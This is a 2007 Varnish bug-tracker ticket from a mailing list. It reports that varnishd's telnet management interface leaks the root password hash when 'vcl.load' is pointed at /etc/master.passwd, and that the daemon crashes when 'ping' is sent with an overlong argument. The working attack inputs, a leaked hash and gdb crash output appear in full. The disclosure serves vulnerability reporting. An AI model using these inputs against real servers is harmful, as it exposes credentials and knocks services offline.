[Varnish] #83: varnishd dos via telnet interface + listing of root password hash
Varnish
varnish-bugs at projects.linpro.no
Fri Feb 9 07:53:52 CET 2007
#83: varnishd dos via telnet interface + listing of root password hash
-------------------------------+--------------------------------------------
Reporter: kokanin at gmail.com | Owner: phk
Type: defect | Status: new
Priority: normal | Milestone:
Component: varnishd | Version:
Severity: major | Keywords:
-------------------------------+--------------------------------------------
pkg_info | grep -i varni
varnish-1.0.2_2 The Varnish high-performance HTTP accelerator
uname -r
6.1-RELEASE-p10
./bin/varnishd/varnishd -a lort.dk:1234 -b lort.dk:80 -T lort.dk:1235
Listing of root password hash:
connect to the telnet port of the varnishd and send: vcl.load blah
/etc/master.passwd
output:
106 189
Syntax error at
In VCL code Line 3 Pos 4
root:$1$O9wJ12Nm$IK.3lrgZJNCddlzMKt0f4/:0:0::0:0:Charlie &:/root:/bin/csh
crashing varnishd (DoS):
ping
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
105 20
Too many parameters
# nc lort.dk 1235
# ps axuww | grep varnish
root 66894 0.0 0.2 1512 888 p0 S+ 12:55PM 0:00.00 grep
varnish
# tail -n 1 /var/log/messages
Nov 9 12:55:42 lort kernel: pid 66830 (varnishd), uid 0: exited on signal
6 (core dumped)
[root at lort /usr/ports/www/varnish/varnish-1.0.2]# gdb -q
./bin/varnishd/.libs/varnishd -c /varnishd.core
(no debugging symbols found)...Core was generated by `varnishd'.
Program terminated with signal 6, Aborted.
Reading symbols from
/usr/ports/www/varnish/varnish-1.0.2/lib/libvarnish/.libs/libvarnish.so.0...(no
debugging symbols found)...done.
Loaded symbols for
/usr/ports/www/varnish/varnish-1.0.2/lib/libvarnish/.libs/libvarnish.so.0
Reading symbols from
/usr/ports/www/varnish/varnish-1.0.2/lib/libvcl/.libs/libvcl.so.0...(no
debugging symbols found)...done.
Loaded symbols for
/usr/ports/www/varnish/varnish-1.0.2/lib/libvcl/.libs/libvcl.so.0
Reading symbols from /usr/lib/libthr.so.2...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libthr.so.2
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /libexec/ld-elf.so.1...(no debugging symbols
found)...done.
Loaded symbols for /libexec/ld-elf.so.1
#0 0x2816d363 in kill () from /lib/libc.so.6
[New Thread 0x806f000 (LWP 100094)]
(gdb) x/i $pc
0x2816d363 <kill+7>: jb 0x2816d348 <sigprocmask+12>
(gdb) i r
eax 0x0 0
ecx 0xbfbfe4b0 -1077943120
edx 0x1 1
ebx 0x280b829c 671842972
esp 0xbfbfe4ac 0xbfbfe4ac
ebp 0xbfbfe4c8 0xbfbfe4c8
esi 0xbfbfe4e8 -1077943064
edi 0x807943b 134714427
eip 0x2816d363 0x2816d363
eflags 0x296 662
cs 0x33 51
ss 0x3b 59
ds 0x3b 59
es 0x3b 59
fs 0x3b 59
gs 0x1b 27
(gdb) bt
#0 0x2816d363 in kill () from /lib/libc.so.6
#1 0x280ad2d2 in raise () from /usr/lib/libthr.so.2
#2 0x2816c014 in abort () from /lib/libc.so.6
#3 0x280988f2 in lbv_assert () from
/usr/ports/www/varnish/varnish-1.0.2/lib/libvarnish/.libs/libvarnish.so.0
#4 0x0805d871 in mgt_cli_callback ()
#5 0x0805eb31 in ev_schedule_one ()
#6 0x0805ecc5 in ev_schedule ()
#7 0x0805ca99 in mgt_run ()
#8 0x08063c7e in main ()
(gdb)
--
Ticket URL: <http://varnish.projects.linpro.no/ticket/83>
Varnish <http://varnish.projects.linpro.no/>
The Varnish HTTP Accelerator
More information about the varnish-bugs
mailing list